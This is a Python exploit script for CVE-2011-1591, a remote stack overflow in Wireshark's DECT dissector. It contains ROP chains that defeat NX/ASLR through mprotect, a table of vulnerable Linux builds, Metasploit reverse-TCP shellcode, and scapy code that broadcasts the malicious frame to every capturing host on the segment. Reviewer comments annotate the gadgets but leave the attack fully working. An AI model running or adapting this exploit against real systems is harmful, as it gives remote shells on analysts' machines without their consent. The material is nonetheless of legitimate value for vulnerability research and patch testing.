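#!/usr/bin/env python
# -*- coding: iso-8859-15 -*-
#
# Python 2 script: str literals are byte strings and scapy 2.x is expected.
# print() is used in its single-argument form so the file also parses on
# Python 3, but the bytes/str handling below is Python 2 only.
#
# NOTE(review): the banner's "bypass any NX/ASLR" holds only because the
# wireshark binary is non-PIE (every gadget below is a fixed 0x08xxxxxx
# address) and, for the "labs" chain, because that kernel did not
# randomize the vDSO. A PIE build or a randomized vDSO breaks the chains.
a = """ \n\t-- CVE: 2011-1591 : Wireshark <= 1.4.4 packet-dect.c dissect_dect() --\n
#
# -------- Team : Consortium-of-Pwners
# -------- Author : ipv
# -------- Impact : high
# -------- Target : Archlinux wireshark-gtk-1.4.3-1-i686.pkg.tar.xz
# -------- Description
#
# This code exploits a remote stack based buffer overflow in the DECT dissector of
# wireshark. ROP chains aims to recover dynamically stack address, mprotect it and stack pivot to
# shellcode located the payload.
# All the process is automated, and bypass any NX/ALSR.
#
# Operating Systems tested : [see the summary] with scapy >= 2.5
# For any comments, remarks, news, please mail me : ipv _at_ [team] . net
###########################################################################\n"""

import sys
import struct

# scapy 2.x exposes everything under scapy.all, older releases under scapy;
# the interpreter version is used as a proxy for the scapy generation.
if sys.version_info >= (2, 5):
    from scapy.all import *
else:
    from scapy import *


def _x(v):
    """Pack *v* as a little-endian 32-bit word (one x86 stack / ROP slot)."""
    return struct.pack("<I", v)


# ---------------------------------------------------------------------------
# Gadget table - Arch Linux 2010.05 default package
#   - wireshark-cli-1.4.3-1-i686.pkg.tar.xz
#   - wireshark-gtk-1.4.3-1-i686.pkg.tar.xz
#
# Strategy: recover esp, mask it to a 64 KiB boundary, resolve mprotect()
# from got[fopen], make that 64 KiB window RWX, then pivot below esp into
# the NOP sled that precedes the shellcode.
# ---------------------------------------------------------------------------
arch_rop_chain = [
    # Safe SEIP overwrite: the first gadget just eats three fake args so the
    # dissector's own epilogue does not fault before the chain starts.
    _x(0x8069acb),                          # pop ebx ; pop esi ; pop ebp
    _x(0), _x(0x80e9360), _x(0),            # fake (arg1, arg2, arg3)

    # mprotect 1st arg: stack & 0xffff0000
    _x(0x8067d90),                          # push esp ; pop ebp
    _x(0x8081f2e),                          # xchg ebp eax
    _x(0x80f9d7f),                          # xchg ecx, eax
    _x(0x8061804),                          # pop eax
    _x(0xffff0000),                         #   mask -> eax
    _x(0x80c69f0),                          # xchg edi, eax
    _x(0x80ff067),                          # and ecx edi ; dec ecx
    _x(0x8077c53),                          # inc ecx ; sub al 0x5d (undo the dec)
    _x(0x8061804),                          # pop eax
    # 0x7f16a5d0 - 0x76fbdb8c = 0x081aca44, right next to got[fopen]
    # (0x81aca20, below) - presumably a writable word in the binary's data
    # segment, so the stray "dec dword" of the next gadget does not fault.
    _x(0x7f16a5d0),                         #   avoid crash with dec dword [ecx-0x76fbdb8c]
    _x(0x8048360),                          # xchg ecx eax
    # NOTE(review): this gadget also executes "std" and leaves DF=1 for the
    # rest of the chain and the shellcode. The msf shellcode below uses no
    # string instructions, so it is tolerated; a different payload may not be.
    _x(0x8089f46),                          # xchg edx eax ; std ; dec dword [ecx-0x76fbdb8c]
    _x(0x8067d90),                          # push esp ; pop ebp
    _x(0x8081f2e),                          # xchg ebp eax
    _x(0x8067d92) * 7,                      # ret x7 (padding)
    # eax now holds the address of the "xchg ebp eax" slot above; the slot
    # 0x50 bytes (20 slots) further down is the mprotect base-address slot,
    # so this stores the masked stack address there.
    _x(0x80745f9),                          # mov [eax+0x50] edx ; pop ebp
    _x(0),

    # Resolve mprotect from the GOT: @mprotect = @fopen + 0x6fe70
    # (offset specific to the libc shipped with that Arch snapshot).
    _x(0x8065226),                          # pop eax
    _x(0x81aca20 - 0xc),                    #   got[fopen] - 0xc
    _x(0x8074597),                          # mov eax [eax+0xc]
    _x(0x8048360),                          # xchg ecx eax
    _x(0x8065226),                          # pop eax
    _x(0x6fe70),
    _x(0x8081f2e),                          # xchg ebp eax
    _x(0x806973d),                          # add ecx ebp
    _x(0x08104f61),                         # jmp *%ecx  (-> mprotect)
    # mprotect returns here and this gadget pops its three arguments.
    _x(0x0811eb63),                         # pop ebx, pop esi, pop edi

    # mprotect args (base_addr, length, mode)
    _x(0),                                  # stack base, patched at runtime (see above)
    _x(0x10000),                            # length 0x10000 (64 KiB, matches the mask)
    _x(0x7),                                # PROT_READ|PROT_WRITE|PROT_EXEC

    # Pivot: jump 0xff+0x50 bytes below esp, into the NOP sled.
    # NOTE(review): the sled must lie inside the window made RWX above; if
    # esp sits within the bottom 0x14f bytes of that 64 KiB region the
    # target is still non-executable and the exploit fails.
    _x(0x8061804),                          # pop eax
    _x(0xff + 0x50),                        #   displacement
    _x(0x80b8fc8),                          # xchg edi eax
    _x(0x8067d90),                          # push esp ; pop ebp
    _x(0x80acc63),                          # sub ebp, edi ; dec ecx
    _x(0x8081f2e),                          # xchg ebp eax
    _x(0x0806979e),                         # jmp *eax
]

# ---------------------------------------------------------------------------
# Gadget table - BT4, wireshark 1.4.3 built from source without SSP /
# FORTIFY_SOURCE.
#
# Same idea, but mprotect is reached through int 0x80 in the (then
# non-randomized) vDSO instead of the libc wrapper.
# ---------------------------------------------------------------------------
labs_rop_chain = [
    # Safe SEIP overwrite
    _x(0x08073fa1),                         # pop ebx ; pop esi ; pop ebp
    _x(0), _x(0x0808c4d3), _x(0),           # fake (arg1, arg2, arg3)

    # sys_mprotect: eax=125 (0x7d) ; ebx=base ; ecx=length ; edx=mode
    # 3rd arg (mode). "pop es" loads a null selector into ES; presumably
    # harmless because nothing later is ES-relative.
    _x(0x080e64cf),                         # pop edx ; pop es ; add cl cl
    _x(0x7), _x(0x0),                       #   edx = RWX, es = 0

    # 1st arg: esp & 0xffff0000 -> ebx
    _x(0x080a1711),                         # mov edi esp ; dec ecx
    _x(0x0815b74f),                         # pop ecx
    _x(0xffff0000),                         #   mask
    _x(0x0804c73c),                         # xchg ecx eax
    _x(0x080fadd7),                         # and edi eax ; dec ecx
    _x(0x0804c73c),                         # xchg ecx eax
    _x(0x080af344),                         # mov ebx edi ; dec ecx

    # 2nd arg (length)
    _x(0x0815b74f),                         # pop ecx
    _x(0x10000),                            #   0x10000 (64 KiB)

    # Syscall through the vDSO: relies on the "int 0x80" there being
    # followed by a ret so execution resumes with the next slot.
    _x(0x80d8b71),                          # pop eax
    _x(0x7D),                               #   __NR_mprotect
    _x(0x804e6df),                          # pop esi
    _x(0xffffe411),                         #   int 0x80 in the vDSO
    # _x(0xffffe414),                       #   sysenter in the vDSO (alternative)
    _x(0x080ab949),                         # jmp *esi

    # Pivot below esp into the NOP sled.
    # NOTE(review): per the gadget comments the "mov edi esp" gadget also
    # decrements ecx, so the real displacement is 255, not 256 - still in
    # the sled, but keep it in mind when retuning the stack size.
    _x(0x0815b74f),                         # pop ecx
    _x(256),                                #   displacement
    _x(0x080a1711),                         # mov edi esp ; dec ecx
    _x(0x081087d3),                         # sub edi ecx ; dec ecx
    _x(0x080f7cb1),                         # jmp *edi
]

# Known builds. Columns: name, STACK SIZE, gadget table.
# STACK SIZE is the number of bytes from the start of the overflowed buffer
# to the saved EIP for that build (see build_payload); a negative value is a
# status code decoded by usage() and the entry is not exploitable here.
addr_os = {
    #  ID   OS                              STACK SIZE  GADGET TABLE
    1:  ["Arch Linux 2010.05",    0xb9, arch_rop_chain],   # wireshark-gtk-1.4.3-1-i686.pkg.tar.xz
    2:  ["Labs test ",            0xbf, labs_rop_chain],
    -1: ["Debian 5.0.8 Lenny",    -3,   False],            # wireshark_1.0.2-3+lenny12_i386.deb
    -2: ["Debian 6.0.2 Squeeze",  -1,   False],            # wireshark_1.2.11-6+squeeze1_i386.deb
    -3: ["Fedora 14 ",            -1,   False],            # wireshark-1.4.3-1.2.2.i586.rpm
    -4: ["OpenSuse 11.3 ",        -1,   False],            # wireshark-1.4.3-1.2.2.i586.rpm
    -5: ["Ubuntu 10.10 | 11.04",  -1,   False],
    -6: ["Gentoo *",              -2,   False],
}

# msfpayload linux/x86/shell_reverse_tcp LHOST=127.0.0.1 C
# LPORT was left at the default 4444: the bytes push 0x115c (4444) for the
# port and 0x0100007f (127.0.0.1) for the address.
# NOTE(review): the connect-back happens *on the victim*, so 127.0.0.1 only
# ever reaches a listener running on the victim host itself. Regenerate the
# payload with a real LHOST/LPORT for anything other than a same-host test.
rev_tcp_shell = (
    "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e"
    "\x68\x7f\x00\x00\x01\x66\x68\x11\x5c\x66\x53\x6a\x10\x51\x50\x89\xe1"
    "\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50"
    "\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
    "\x0b\xcd\x80"
)

NOP = "\x90"
HEAD_NOP = 50           # NOPs in front of the shellcode; the pivot lands in here
DECT_ETHERTYPE = 0x2323 # EtherType the DECT dissector is registered on


def usage():
    """Print the banner table of known builds and exit with status 1."""
    print("Please select an ID > 0 (negative IDs are listed for information only):\n")
    # column header (tabs reconstructed; the original paste had collapsed them)
    print(" ID\tTARGET\t\t\tINFO")
    print("--------------------------------------------------------------------")
    # exploitable targets first, then the known-not-exploitable builds
    for target_id in sorted(addr_os, reverse=True):
        name, stack_size = addr_os[target_id][0], addr_os[target_id][1]
        if stack_size == -1:
            info = "Default package uses LibSSP & Fortify Source"
        elif stack_size == -2:
            info = "Compiled/Build with Fortify Source"
        elif stack_size == -3:
            info = "DECT protocol not supported"
        else:
            info = "VULN -> Stack size %d" % stack_size
        print("%2d-- %s  %s" % (target_id, name, info))
    sys.exit(1)


def build_payload(smash_len, rop_chain):
    """Return shellcode + ROP chain laid out for a build with *smash_len*.

    smash_len: bytes from the overflowed buffer to the saved EIP (the
        STACK SIZE column of addr_os).
    rop_chain: list of packed slots (one of the *_rop_chain tables).

    Raises ValueError when smash_len cannot hold the NOP head plus the
    shellcode; the original silently produced an empty tail (negative
    string multiplier) and a misaligned chain in that case.
    """
    min_len = HEAD_NOP + len(rev_tcp_shell)
    if smash_len < min_len:
        raise ValueError("stack size %d is smaller than %d NOPs + %d shellcode bytes"
                         % (smash_len, HEAD_NOP, len(rev_tcp_shell)))
    tail_nops = smash_len - len(rev_tcp_shell) - HEAD_NOP
    shellcode = NOP * HEAD_NOP + rev_tcp_shell + NOP * tail_nops
    payload = shellcode + "".join(rop_chain)
    # The original calls this "stack alignment": when the total length is
    # odd, the first byte is dropped, which shifts the whole buffer - and so
    # the chain's position relative to the saved EIP - by one byte. The
    # STACK SIZE values above were tuned with this in place; keep it.
    if len(payload) % 2:
        payload = payload[1:]
    return payload


print(a)

if len(sys.argv) < 2:
    usage()
try:
    target_id = int(sys.argv[1])
except ValueError:
    # a non-numeric ID used to die with a traceback instead of the table
    usage()
if target_id not in addr_os or target_id < 0:
    usage()
# optional second argument: interface to inject on (default: scapy's conf.iface)
iface = sys.argv[2] if len(sys.argv) > 2 else None

target_name, smash_len, rop_chain = addr_os[target_id]
print("\n[+] Target : %s" % target_name)
print("\t[+] Length for smashing SEIP : 0x%x(%d)" % (smash_len, smash_len))
try:
    payload = build_payload(smash_len, rop_chain)
except ValueError as err:
    print("[-] %s" % err)
    sys.exit(1)
print("\t[+] Payload length : %d" % len(payload))

# Layer-2 broadcast on the DECT EtherType: every host on the segment that is
# capturing with a vulnerable Wireshark dissects this frame and runs the
# payload, not one chosen target. Only send this on an isolated lab segment.
evil_packet = Ether(type=DECT_ETHERTYPE, dst="ff:ff:ff:ff:ff:ff") / payload
# evil_packet.show()
print("\t[+] Evil packet length : %d" % len(evil_packet))
print("\t[+] Sending packet to broadcast")
if iface is None:
    sendp(evil_packet)
else:
    sendp(evil_packet, iface=iface)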